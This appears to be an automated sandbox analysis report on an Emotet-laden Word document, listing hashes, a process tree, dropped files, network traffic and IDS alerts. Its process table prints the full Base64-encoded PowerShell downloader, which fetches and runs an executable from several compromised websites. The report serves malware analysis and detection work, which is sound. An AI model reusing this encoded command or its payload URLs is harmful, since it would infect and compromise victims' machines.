File name: | check copy.doc.virus |
Full analysis: | https://app.any.run/tasks/fc397541-e130-4969-8cc0-60de5e382011 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 08, 2019, 14:16:13 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Consequatur harum quos., Author: Edita Balov, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 7 18:32:00 2019, Last Saved Time/Date: Thu Nov 7 18:32:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 174, Security: 0 |
MD5: | 1AC18D6A687C062779DFDAB612242A3C |
SHA1: | 06964026AB3E0BA5C7FC8DF7641C1171A6D82319 |
SHA256: | 1C21D6FB2E17A5D6DEDA5FAB46E7CFEABB56A1B9C598234431BBA513824CCFD5 |
SSDEEP: | 6144:gzCTdWsDiEBJxXHNaq2SzGdD48+aMOnVT4yYmdjSS:gzCTdWsDiEBJxdafWGe8+lOnVXdSS |
.doc | | | Microsoft Word document (80) |
---|
HeadingPairs: |
|
---|---|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 203 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 174 |
Words: | 30 |
Pages: | 1 |
ModifyDate: | 2019:11:07 18:32:00 |
CreateDate: | 2019:11:07 18:32:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Edita Balážová |
Subject: | - |
Title: | Consequatur harum quos. |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2152 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\check copy.doc.virus.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3996 | powershell -enco JABUAGwAawB2AHEAeAByAHYAZQBxAGsAPQAnAEIAeABqAHUAeAByAHYAawBtAGMAZQBmACcAOwAkAFEAdwB2AHUAZQBhAHgAeABqAHQAYgBtAHYAIAA9ACAAJwA3ADYAMQAnADsAJABSAHYAbwBvAHUAeABxAHQAPQAnAE8AegB5AGIAcQBlAHQAZQBkAHcAbQAnADsAJABLAHcAYgBrAHoAbABqAGUAdwBtAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABRAHcAdgB1AGUAYQB4AHgAagB0AGIAbQB2ACsAJwAuAGUAeABlACcAOwAkAE8AZABqAGQAZwBpAGcAcAB3AD0AJwBEAGoAYwB3AGMAeABrAGQAeQBlAGoAJwA7ACQATQB5AHgAZABqAGsAegBpAHAAawByAHYAYQA9AC4AKAAnAG4AJwArACcAZQAnACsAJwB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAHQALgB3AEUAQgBjAEwAaQBlAG4AVAA7ACQAQwBoAGEAZABnAGIAcgB1AHcAZgBsAGIAPQAnAGgAdAB0AHAAOgAvAC8AbgBhAG4AbgBhAGsAYQByAGEALgBjAG8AbQAvAGkAMABvADkAcQB0AGwALwBkAHUANgB0ADgAeQB3AEsALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGEAcgBzAG8AbgBzAGkAbgBmAG8ALgBjAG8AbQAvAGMAcwBzAC8AMABBAEgANABOAHUANABWAEgASgAvACoAaAB0AHQAcAA6AC8ALwBiAGwAbwBnAC4AYQBpAGQAaABvAG8ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGMAcwBzAC8AYwBvAGwAbwByAHMALwBzAHUAbgByAGkAcwBlAC8AeQB2AGQAcwAyAGQALwAqAGgAdAB0AHAAcwA6AC8ALwBxAHUAYQBsAGkAdAB5AGEAaQByAHAAYQByAHQALgBjAG8AbQAvAHMAaQB0AGUAaABlAG4AZAAvADEANAB2AHEAOQB6AC8AKgBoAHQAdABwAHMAOgAvAC8AZABhAHAAdQByAGcAYQByAG0AZQBuAHQALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHUAZgBkAC8AJwAuACIAUwBwAGAATABJAHQAIgAoACcAKgAnACkAOwAkAEoAdgB5AGsAYgBxAGkAcABnAG8AegBrAGsAPQAnAEsAZQBhAHIAZwBpAHgAaABiAHgAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEMAbwBsAGgAaAB4AGkAZwByACAAaQBuACAAJABDAGgAYQBkAGcAYgByAHUAdwBmAGwAYgApAHsAdAByAHkAewAkAE0AeQB4AGQAagBrAHoAaQBwAGsAcgB2AGEALgAiAEQATwB3AGAATgBsAE8AYQBgAGQARgBJAGwAZQAiACgAJABDAG8AbABoAGgAeABpAGcAcgAsACAAJABLAHcAYgBrAHoAbABqAGUAdwBtACkAOwAkAE0AaQBtAGMAZgBsAG0AdABrAD0AJwBPAGcAawBhAHgAdQBkAGwAcwBkAGEAdAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAEsAdwBiAGsAegBsAGoAZQB3AG0AKQAuACIATABgAGUATgBnAHQASAAiACAALQBnAGUAIAAzADQANwA2ADMAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AEEAYABSAFQAIgAoACQASwB3AGIAawB6AGwAagBlAHcAbQApADsAJABMAHAAbABvAHgAbgB5AGsAdwBoAHUAbQA9ACcAWAB6AHoAYgBqAGwAbAB3AGkAYQBtAHgAbAAnADsAYgByAGUAYQBrADsAJABMAG8AdAB5AG4AegB3AGkAPQAnAEkAcAB2AG4AcwBjAGgAagBtAHUAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwBqAHMAZgBvAGgAbABiAD0AJwBPAGgAawBzAGIAbwBnAHoAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3048 | "C:\Users\admin\761.exe" | C:\Users\admin\761.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Watson Subscriber for SENS Network Notifications Exit code: 0 Version: 12.0.6606.1000 | ||||
2200 | --4d8d1bb0 | C:\Users\admin\761.exe | 761.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Watson Subscriber for SENS Network Notifications Exit code: 0 Version: 12.0.6606.1000 | ||||
2788 | "C:\Users\admin\AppData\Local\wholesspi\wholesspi.exe" | C:\Users\admin\AppData\Local\wholesspi\wholesspi.exe | — | 761.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Watson Subscriber for SENS Network Notifications Exit code: 0 Version: 12.0.6606.1000 | ||||
3744 | --dfba43e0 | C:\Users\admin\AppData\Local\wholesspi\wholesspi.exe | — | wholesspi.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Watson Subscriber for SENS Network Notifications Version: 12.0.6606.1000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRAAF0.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3996 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SMAJA29DIZDYFQL0J2TY.temp | — | |
MD5:— | SHA256:— | |||
2152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\38D532FA.wmf | wmf | |
MD5:54D4FEBE6016275B958F92EB88EF57FA | SHA256:550C4FA4EEF1C6D97B64D5CFE9DAE6C31BE84C8BBE5CA5DCBD42F6353B26DCEA | |||
2152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2C37ED0C.wmf | wmf | |
MD5:DAD18C4F34957EF8E85326B2090FE3E3 | SHA256:80CCCDFFB776D45B678C907EA53F4BEAEA8CAA60D9A717662DC86C9AA4EFD956 | |||
2152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF2B877E230A1376A6.TMP | — | |
MD5:— | SHA256:— | |||
2152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2551C4B7-56CE-41D5-8AB8-961624A5D14F}.tmp | — | |
MD5:— | SHA256:— | |||
2152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{00481E3C-3D53-4594-8590-C7377465EC7E}.tmp | — | |
MD5:— | SHA256:— | |||
2152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\94253177.wmf | wmf | |
MD5:C95BDB920C99871A00BCCA6D94528F91 | SHA256:7D99935B3E40EEB8400E94E73B1C6E9C56ABC16B9AEDE9CFB1EDB6DBF19A7F00 | |||
2152 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\check copy.doc.virus.doc.LNK | lnk | |
MD5:813DA51AB256EA1D81A9844E0735B3B8 | SHA256:FB65B7F7DD233B2DFFB5820472C146566DE568CD9816C88AD9BF772966B7BD38 | |||
3996 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39be0b.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3996 | powershell.exe | GET | 200 | 165.22.62.126:80 | http://nannakara.com/i0o9qtl/du6t8ywK/ | US | executable | 113 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3996 | powershell.exe | 165.22.62.126:80 | nannakara.com | — | US | suspicious |
Domain | IP | Reputation |
---|---|---|
nannakara.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3996 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3996 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3996 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |